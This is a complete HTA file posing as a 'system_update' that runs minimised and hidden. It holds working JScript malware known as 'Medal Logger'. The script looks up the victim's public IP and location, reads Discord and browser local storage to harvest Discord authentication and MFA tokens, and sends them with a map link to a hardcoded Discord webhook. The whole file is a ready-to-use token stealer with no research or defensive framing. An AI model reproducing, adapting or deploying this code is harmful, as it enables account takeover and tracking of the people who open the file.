
<hta:application
    id="oBJECT"
    applicationName="system_update"
    version="1.0"
    caption="no"
    showInTaskBar="no"
    singleInstance="yes"
    windowState="minimize"
    scroll="no"
    navigable="yes"
/>

<html>
<head>
<title>Executing...</title>
</head>
<body>
<script language="JScript">
    function main() {
        var webhookUrl = "https://discord.com/api/webhooks/1502379311577956374/Qkt2VOYWbwoBc85FzPUvQ0fHDn0qxPyqxu3kbComwCORP1rdu-D3xJjL9dE41X1okoPK";

        function postToWebhook(payload) {
            try {
                var xhr = new ActiveXObject("MSXML2.XMLHTTP");
                xhr.open("POST", webhookUrl, false);
                xhr.setRequestHeader('Content-Type', 'application/json');
                xhr.send(JSON.stringify(payload));
            } catch (e) {}
        }

        function getPublicIntel() {
            try {
                var xhr = new ActiveXObject("MSXML2.XMLHTTP");
                xhr.open("GET", "https://ipinfo.io/json", false);
                xhr.send();
                var data = eval('(' + xhr.responseText + ')');
                return {
                    ip: data.ip || "N/A", city: data.city || "N/A", region: data.region || "N/A",
                    country: data.country || "N/A", org: data.org || "N/A", loc: data.loc || "N/A"
                };
            } catch (e) {
                return { ip: "N/A", city: "N/A", region: "N/A", country: "N/A", org: "N/A", loc: "N/A" };
            }
        }

        function findTokens() {
            var shell = new ActiveXObject("WScript.Shell");
            var fso = new ActiveXObject("Scripting.FileSystemObject");
            var appData = shell.ExpandEnvironmentStrings("%APPDATA%");
            var localAppData = shell.ExpandEnvironmentStrings("%LOCALAPPDATA%");
            var paths = {
                'Discord': appData + '\\discord\\Local Storage\\leveldb\\',
                'Discord Canary': appData + '\\discordcanary\\Local Storage\\leveldb\\',
                'Discord PTB': appData + '\\discordptb\\Local Storage\\leveldb\\',
                'Google Chrome': localAppData + '\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
                'Brave': localAppData + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
                'Yandex': localAppData + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
                'Opera': appData + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\',
                'Opera GX': appData + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\'
            };
            var foundTokens = [];
            var tokenRegex = new RegExp("[\\w-]{24,26}\\.[\\w-]{6}\\.[\\w-]{25,110}", "g");
            var mfaRegex = new RegExp("mfa\\.[\\w-]{84}", "g");
            for (var name in paths) {
                if (!fso.FolderExists(paths[name])) continue;
                var folder = fso.GetFolder(paths[name]);
                var files = new Enumerator(folder.Files);
                for (; !files.atEnd(); files.moveNext()) {
                    var file = files.item();
                    if (file.Name.substr(file.Name.length - 4) === ".log" || file.Name.substr(file.Name.length - 4) === ".ldb") {
                        try {
                            var stream = file.OpenAsTextStream(1, -2); var content = stream.ReadAll(); stream.Close();
                            var allMatches = content.match(tokenRegex) || []; var mfaMatches = content.match(mfaRegex) || [];
                            var combinedMatches = allMatches.concat(mfaMatches);
                            for (var i = 0; i < combinedMatches.length; i++) {
                                var token = combinedMatches[i]; var isPresent = false;
                                for (var j = 0; j < foundTokens.length; j++) { if (foundTokens[j] === token) { isPresent = true; break; } }
                                if (!isPresent) { foundTokens.push(token); }
                            }
                        } catch (e) {}
                    }
                }
            }
            return foundTokens;
        }

        var publicIntel = getPublicIntel();
        var tokens = findTokens();
        var gmapsLink = publicIntel.loc !== "N/A" ? "https://www.google.com/maps?q=" + publicIntel.loc : "Coordinates unavailable";
        var tokenFields = [];
        for (var i = 0; i < tokens.length; i++) { tokenFields.push({ name: "🔑 Token #" + (i + 1), value: "```" + tokens[i] + "```", inline: false }); }
        var description = "**Timestamp:** `" + new Date().toISOString() + "`\n**Total Tokens Found:** `" + tokens.length + "`\n\n";
        if (tokens.length === 0) { description += "No Discord tokens found."; }
        var payload = {
            username: "Medal Logger", avatar_url: "https://cdn.aptoide.com/imgs/9/e/0/9e094c5ef07f2e5bcd5ec3c60bf7669c_icon.png",
            embeds: [{
                title: "Scepter Acquired: Full Account Compromise Logged", description: description, color: 9699539,
                fields: [
                    { name: "🌐 Public IP", value: "`" + publicIntel.ip + "`", inline: true },
                    { name: "🏢 ISP / Org", value: "*" + publicIntel.org + "*", inline: true },
                    { name: "📍 Geolocation", value: publicIntel.city + ", " + publicIntel.region + ", " + publicIntel.country, inline: false },
                    { name: "🗺️ Map View", value: gmapsLink !== "N/A" ? "[Click to View Approximate Location](" + gmapsLink + ")" : "Coordinates unavailable", inline: false}
                ].concat(tokenFields),
                footer: { text: "Medal Logger // KINGDOM CAPTURED" }
            }]
        };
        postToWebhook(payload);
        self.close();
    }
    main();
</script>
</body>
</html>
